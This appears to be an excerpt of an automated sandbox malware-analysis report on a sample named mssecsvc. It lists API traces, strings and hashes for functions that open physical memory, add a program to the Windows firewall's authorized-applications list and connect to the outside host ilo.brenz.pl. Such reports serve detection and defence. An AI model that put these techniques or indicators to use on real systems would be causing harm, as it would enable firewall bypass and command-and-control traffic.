API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: 2088b6c76b8a6be68382f79cae9732484fb1a1ee9dfb7a6f97ccbe8c37637849
Instruction ID: c204f4264080c3a2377689963a17c0de2230fa6fd9ef3b92f391d4da379442de
Opcode Fuzzy Hash: 2088b6c76b8a6be68382f79cae9732484fb1a1ee9dfb7a6f97ccbe8c37637849
Instruction Fuzzy Hash: 78818971500208FFEB248F15CC89AAA7BBCEF49705F504618FD199B291D3F0AF458B68

Function 7FE433E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE4344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE43469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE43493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE434A0
UnmapViewOfFile.KERNEL32(?), ref: 7FE434B8

Strings

\Device\PhysicalMemory, xrefs: 7FE433E0
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43414

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction ID: 7fc34539aa9aeb006e3fd3aa9e627af0260f8b81ce38453cec28ed3fa0a6c215
Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction Fuzzy Hash: 40817671600208BFEB218F14DC89ABA3BADEF44704F504658FD1A9B295D3B4AF459BA4

Function 00AA3405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AA344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AA3469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AA3493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AA34A0
UnmapViewOfFile.KERNEL32(?), ref: 00AA34B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3414
ysic, xrefs: 00AA3450, 00AA3466

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: 3a1afca7d86bc8a8c5abff91119868195bcd2837266d417308d89fa1a4a13e06
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: 66116D71140608BBEB24CF14CC59FAA767CEF88704F50451CFA199B2D0E7F46F148A68

Function 7FE43405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE4344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE43469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE43493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE434A0
UnmapViewOfFile.KERNEL32(?), ref: 7FE434B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43414
ysic, xrefs: 7FE43450, 7FE43466

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: f43c089fce9089dd7d505f4faf75d8f33636ceb6be771680bc0a2bec27c6fb95
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: D5118B74640609BFEB24CF10DC55FEA367CEF88744F10451CFA1A9A290E7F46F189A28

Function 00AA24AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\tputVt), ref: 00AA24BA
lstrlenW.KERNEL32(?), ref: 00AA24C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00AA2516

Strings

\BaseNamedObjects\tputVt, xrefs: 00AA24B8

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\tputVt
API String ID: 2597515329-2261315748
Opcode ID: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction ID: 92c1ffa831d56b6296a11355c9b9f41d6c602547f9c68c1e08e98fda6007e819
Opcode Fuzzy Hash: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction Fuzzy Hash: 980181B0785344BAF7309B29CC4BF5B7929DF85B50F548558F608AE1C4DAB89A0483A9

Function 7FE424AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\tputVt), ref: 7FE424BA
lstrlenW.KERNEL32(?), ref: 7FE424C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FE42516

Strings

\BaseNamedObjects\tputVt, xrefs: 7FE424B8

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\tputVt
API String ID: 2597515329-2261315748
Opcode ID: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction ID: b59113b06402ddd1e6da3b59c174d95be42712fc9add0a4248e34075b754a1f5
Opcode Fuzzy Hash: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction Fuzzy Hash: A70181B0785344BAF7309B29CC4BF5B7929DF81B50F508558F708AE1C4DAB89A0483A9

Function 00AA3F8F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 224networkthreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AA3F83), ref: 00AA3F8F
WSAStartup.WS2_32(00000101), ref: 00AA3FCE
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AA3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AA3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AA3FFF
lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AA4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AA4066
socket.WS2_32(00000002,00000001,00000000), ref: 00AA4097
connect.WS2_32(6F6C6902,00AA3B09,00000010), ref: 00AA40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AA40FB
wsprintfA.USER32 ref: 00AA4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AA41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00AA6AA2,00000000,00000000), ref: 00AA41BD
GetTickCount.KERNEL32 ref: 00AA41F6
RtlExitUserThread.NTDLL(00000000), ref: 00AA4322

Strings

ilo.brenz.pl, xrefs: 00AA4056, 00AA4065
\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
020a00 . . :#73204497e +*, xrefs: 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
API String ID: 3316401344-1495104694
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: a6abbf6f5737d5b1a56f008b70c99df5fc1d73a109d756f3fc74ddd7c870bbb7
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: 19918A71508248BAEB319F28881DBEA7BADEF8A301F040648F95A9F1C1D3F45F45DB65

Function 7FE43F8F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 224networkthreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE43F83), ref: 7FE43F8F
WSAStartup.WS2_32(00000101), ref: 7FE43FCE
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE44057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE44066
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE441B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE441BD
GetTickCount.KERNEL32 ref: 7FE441F6
RtlExitUserThread.NTDLL(00000000), ref: 7FE44322

Strings

020a00 . . :#73204497e +*, xrefs: 7FE44195, 7FE441DB
ilo.brenz.pl, xrefs: 7FE44056, 7FE44065
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
API String ID: 3316401344-1495104694
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: 258e21987668317533843a9e7f1ff18d854900d0519197baaf77827f0a23c433
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: 1391AC75608348BAEB219F349819BEA7BADEF41304F00264CFC5A9E181C3F46F45DB65

Function 00AA3EB5 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 276networklibrarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AA3EA9), ref: 00AA3EB5

Part of subcall function 00AA3ECC: GetProcAddress.KERNEL32(00000000,00AA3EC0), ref: 00AA3ECD
Part of subcall function 00AA3ECC: GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AA3EE2
Part of subcall function 00AA3ECC: wsprintfA.USER32 ref: 00AA3EF7
Part of subcall function 00AA3ECC: CreateThread.KERNEL32(00000000,00000000,00AA3691,00000000,00000000), ref: 00AA3F40
Part of subcall function 00AA3ECC: CloseHandle.KERNEL32(?,780B832E), ref: 00AA3F49

CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AA3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AA3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AA3FFF
socket.WS2_32(00000002,00000001,00000000), ref: 00AA4097
connect.WS2_32(6F6C6902,00AA3B09,00000010), ref: 00AA40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AA40FB
wsprintfA.USER32 ref: 00AA4179

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
020a00 . . :#73204497e +*, xrefs: 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 4150863296-2633921094
Opcode ID: 09b915f81939338777e2238991f3bc6e2e241302df667124e3c5a6440f8bf480
Instruction ID: 9554290cedf8e6fab48a230e72c5ce263c6f689cf07c7f49c1b51f187949117e
Opcode Fuzzy Hash: 09b915f81939338777e2238991f3bc6e2e241302df667124e3c5a6440f8bf480
Instruction Fuzzy Hash: 3BA1BE71518248BEEB219F648C5ABEA7BACEF86300F044649F8499F0C2D7F45F498765

Function 7FE43EB5 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 276networklibrarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE43EA9), ref: 7FE43EB5

Part of subcall function 7FE43ECC: GetProcAddress.KERNEL32(00000000,7FE43EC0), ref: 7FE43ECD
Part of subcall function 7FE43ECC: GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2
Part of subcall function 7FE43ECC: wsprintfA.USER32 ref: 7FE43EF7
Part of subcall function 7FE43ECC: CreateThread.KERNEL32(00000000,00000000,7FE43691,00000000,00000000), ref: 7FE43F40
Part of subcall function 7FE43ECC: CloseHandle.KERNEL32(?,780B832E), ref: 7FE43F49

CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 4150863296-2633921094
Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction ID: 0e8994d83ddfd1691c77ce3bf3b5f199d94e5f32b824b4e6e19193fb5f8cc64f
Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction Fuzzy Hash: D1A1FE71509348BFEB219F249C49BEA7BACEF81304F00565DF84A8E181D6F46F05DBA6

Function 00AA3ECC Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 265threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00AA3EC0), ref: 00AA3ECD
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AA3EE2
wsprintfA.USER32 ref: 00AA3EF7
CreateThread.KERNEL32(00000000,00000000,00AA3691,00000000,00000000), ref: 00AA3F40
CloseHandle.KERNEL32(?,780B832E), ref: 00AA3F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AA3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AA3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AA3FFF

Part of subcall function 00AA3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AA344A
Part of subcall function 00AA3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AA3469
Part of subcall function 00AA3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AA3493
Part of subcall function 00AA3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AA34A0
Part of subcall function 00AA3405: UnmapViewOfFile.KERNEL32(?), ref: 00AA34B8

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AA3F0C
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AA3EF6, 00AA3F08
020a00 . . :#73204497e +*, xrefs: 00AA3EDF, 00AA3EF4, 00AA3F0B, 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 541178049-2633921094
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: d49dcd03f6b08019b4636ea30d3eaa8aec2625ee2db97a61eff1c86791902ec8
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: D3A1DE71408248BEEB219F248C4ABEA7BACEF86300F044649F8498F0C2D3F45F4987A5

Function 7FE43ECC Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 265threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE43EC0), ref: 7FE43ECD
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2
wsprintfA.USER32 ref: 7FE43EF7
CreateThread.KERNEL32(00000000,00000000,7FE43691,00000000,00000000), ref: 7FE43F40
CloseHandle.KERNEL32(?,780B832E), ref: 7FE43F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF

Part of subcall function 7FE43405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE4344A
Part of subcall function 7FE43405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE43469
Part of subcall function 7FE43405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE43493
Part of subcall function 7FE43405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE434A0
Part of subcall function 7FE43405: UnmapViewOfFile.KERNEL32(?), ref: 7FE434B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 541178049-2633921094
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: 0676d137f508c61ec9ecc8346a0bbca927df192c87e92b4f0c786ccd2b6385cd
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: E7A1ED71508358BFEB219F249C49BEA7BACEF81304F00565DF84A9E081D6F46F45CBA6

Function 00AA3F60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 215librarystringthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AA3F54), ref: 00AA3F60

Part of subcall function 00AA3F8F: LoadLibraryA.KERNEL32(00AA3F83), ref: 00AA3F8F
Part of subcall function 00AA3F8F: WSAStartup.WS2_32(00000101), ref: 00AA3FCE
Part of subcall function 00AA3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AA3FE9
Part of subcall function 00AA3F8F: CloseHandle.KERNEL32(?,00000000), ref: 00AA3FF2
Part of subcall function 00AA3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AA3FFF
Part of subcall function 00AA3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00AA4097
Part of subcall function 00AA3F8F: connect.WS2_32(6F6C6902,00AA3B09,00000010), ref: 00AA40B1
Part of subcall function 00AA3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00AA40FB

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AA4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AA4066
wsprintfA.USER32 ref: 00AA4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AA41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00AA6AA2,00000000,00000000), ref: 00AA41BD
GetTickCount.KERNEL32 ref: 00AA41F6

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 00AA41DA
020a00 . . :#73204497e +*, xrefs: 00AA4195, 00AA41DB
D s, xrefs: 00AA414F

Memory Dump Source

Source File: 00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_aa0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT
API String ID: 2996464229-1334317923
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: 81148831d52d7080ef9a7be23353995497ffe4b7e2d9055ad614226a71d7a71d
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction Fuzzy Hash: FA81DF71518258BEEB219F248C59BEA7BACEF86300F044659F8499F1C2C3F45F49C761

Function 7FE43F60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 215librarystringthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE43F54), ref: 7FE43F60

Part of subcall function 7FE43F8F: LoadLibraryA.KERNEL32(7FE43F83), ref: 7FE43F8F
Part of subcall function 7FE43F8F: WSAStartup.WS2_32(00000101), ref: 7FE43FCE
Part of subcall function 7FE43F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
Part of subcall function 7FE43F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
Part of subcall function 7FE43F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
Part of subcall function 7FE43F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
Part of subcall function 7FE43F8F: connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
Part of subcall function 7FE43F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE44057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE44066
wsprintfA.USER32 ref: 7FE44179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE441B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE441BD
GetTickCount.KERNEL32 ref: 7FE441F6

Strings

020a00 . . :#73204497e +*, xrefs: 7FE44195, 7FE441DB
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT
API String ID: 2996464229-1334317923
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: 4e50c4f88f24425f4bee18bfb6ce842719449d350e033f98fb2c42de0991043e
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
